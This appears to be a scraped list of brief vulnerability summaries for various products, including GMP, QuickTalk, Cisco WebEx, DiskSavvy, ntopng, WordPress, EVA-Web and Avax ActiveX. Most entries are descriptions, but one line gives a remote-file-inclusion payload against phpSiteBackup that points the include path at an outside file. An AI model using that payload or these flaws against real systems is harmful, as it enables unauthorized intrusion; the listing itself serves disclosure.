A type-confusion vulnerability was discovered in GMP deserialization with crafted object's __wakeup() magic method that can be abused for updating any already assigned properties of any already created objects, this result in serious security issues.
The QuickTalk forum v1.3 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by injecting a malicious string into the 'lang' parameter, which is then used to include a file from the server.
The Cisco WebEx extension allows arbitrary code execution due to a flaw in the way it handles URLs containing a specific pattern. The extension uses nativeMessaging and can execute arbitrary code when a website requests the extension to open a port for communication. The extension uses CustomEvent() objects to pass JSON messages between the webpage, the extension, and the native code.
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
By omitting or supplying arbitrary CSRF tokens, remote attackers can bypass CSRF protection in the ntopng web interface, allowing them to make HTTP requests on an authenticated user's behalf.
This vulnerability allows an attacker to display every user:hash in the database.
This script allows an attacker to upload arbitrary files to a vulnerable Wordpress installation. It takes the target host, a valid username and password, the path to the remote file, and the file to upload as arguments. The script also creates a new post every time it is run, unless a post ID is specified.
The EVA-Web version 1.1 to 2.2 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from a remote server, potentially leading to remote code execution.
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
The Avaxswf.dll library included in the Avax Vector ActiveX v.1.3 software package is vulnerable to arbitrary data write in a remote computer. The WriteMovie method doesn't check if it is being called from the application or from a malicious user, allowing the manipulation of local files insecurely and the ability for malicious users to write arbitrary data to any file on a vulnerable system.
Services By CQR